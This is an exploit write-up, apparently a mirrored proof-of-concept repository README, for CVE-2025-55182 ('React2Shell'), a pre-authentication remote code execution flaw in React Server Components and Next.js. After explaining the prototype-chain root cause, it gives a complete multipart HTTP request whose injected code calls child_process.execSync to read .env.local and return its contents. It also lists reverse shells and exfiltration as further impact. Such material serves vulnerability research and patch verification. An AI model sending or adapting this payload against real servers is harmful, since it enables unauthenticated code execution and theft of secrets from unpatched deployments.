Share
## https://sploitus.com/exploit?id=912D7AB4-A44C-552B-AD23-D4ED786BE137
# CVE-2025-55182 (React2Shell) - Proof of Concept

> **โš ๏ธ WARNING: This repository is for educational and security research purposes only. Do not use this exploit against systems you do not own or have explicit permission to test.**

## Overview

This repository contains a proof-of-concept demonstration of **CVE-2025-55182**, a critical pre-authentication remote code execution vulnerability affecting React Server Components.

**CVSS Score:** 10.0 (Critical)

**Affected Versions:**
- React Server Components 19.0.0, 19.1.0, 19.1.1, and 19.2.0
- Packages: `react-server-dom-parcel`, `react-server-dom-turbopack`, `react-server-dom-webpack`

## Vulnerability Summary

CVE-2025-55182 is an unsafe deserialization vulnerability in React Server Components' Flight protocol implementation. The vulnerability allows unauthenticated attackers to execute arbitrary JavaScript code on the server by crafting malicious payloads that exploit prototype chain traversal and unsafe property access patterns.

### Root Cause

The vulnerability stems from how React Server Components deserialize Flight protocol payloads. When processing module references, the code uses bracket notation to access properties (`moduleExports[metadata[2]]`), which traverses the entire JavaScript prototype chain. This allows attackers to reference properties that weren't explicitly exported, including the `constructor` property, which provides access to the global `Function` constructor.

By chaining prototype pollution techniques with React's internal chunk processing mechanisms, an attacker can construct a payload that ultimately executes arbitrary code through the Function constructor.

## Prerequisites

- Burp Suite Community or Professional (or any HTTP proxy/client)
- A vulnerable version of React.js or Next.js

## Setup Instructions

### Step 1: Create a Vulnerable Project

Create a new project using a version that includes the vulnerable React Server Components:

```bash
npx create-next-app@16.0.6 poc-react2shell
cd poc-react2shell
```

### Step 2: Create a Test Environment File

Create a `.env.local` file in the project root to demonstrate the impact of the vulnerability:

```bash
SECRET_API_KEY=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
```

### Step 3: Start the Development Server

Launch the Next.js development server:

```bash
npm run dev
```

The server should start on `http://localhost:3000`.

## Exploitation Steps

### Step 4: Send the Malicious Payload

1. In Burp Suite, go to the **Repeater** tab
2. Set the target URL to `http://localhost:3000/`
3. Copy and paste the entire payload into the request window
4. Send


Click to expand

```
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 752

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('cat .env.local',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
```



### Step 5: Analyze the Response

The response should contain the contents of your `.env.local` file in the response body:

![Response](./poc.png)

### Payload

The payload consists of three multipart form fields:

**Field 0:** A fake chunk object containing:
- Prototype pollution references (`$1:__proto__:then`)
- A Blob reference (`$B1337`) that triggers the exploit
- A polluted `_response` object with malicious `_prefix` and `_formData.get`

**Field 1:** A reference to field 0 (`$@0`)

**Field 2:** An empty array (`[]`)

The malicious code in `_prefix` reads `.env.local` using Node.js's `child_process.execSync` and embeds the result in an error digest.

## Impact

This vulnerability allows attackers to:

- Execute arbitrary code on the server
- Read sensitive files (environment variables, configuration files, etc.)
- Establish reverse shells
- Exfiltrate data
- Perform any operation the Node.js process has permissions to execute

## References

- [CVE-2025-55182 Details](https://www.cyberhub.blog/cves/CVE-2025-55182)
- [Next.js-RSC-RCE-Scanner-CVE-2025-66478](https://github.com/Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478)
- [React Security Advisory](https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components)
- [Facebook Security Advisory](https://www.facebook.com/security/advisories/cve-2025-55182)
- [CISA Known Exploited Vulnerabilities Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-55182)
- [react2shellcve202555182](https://tryhackme.com/room/react2shellcve202555182)

## Disclaimer

This proof of concept is provided for educational purposes and security research only. Always ensure you have explicit written permission before testing security vulnerabilities on any system.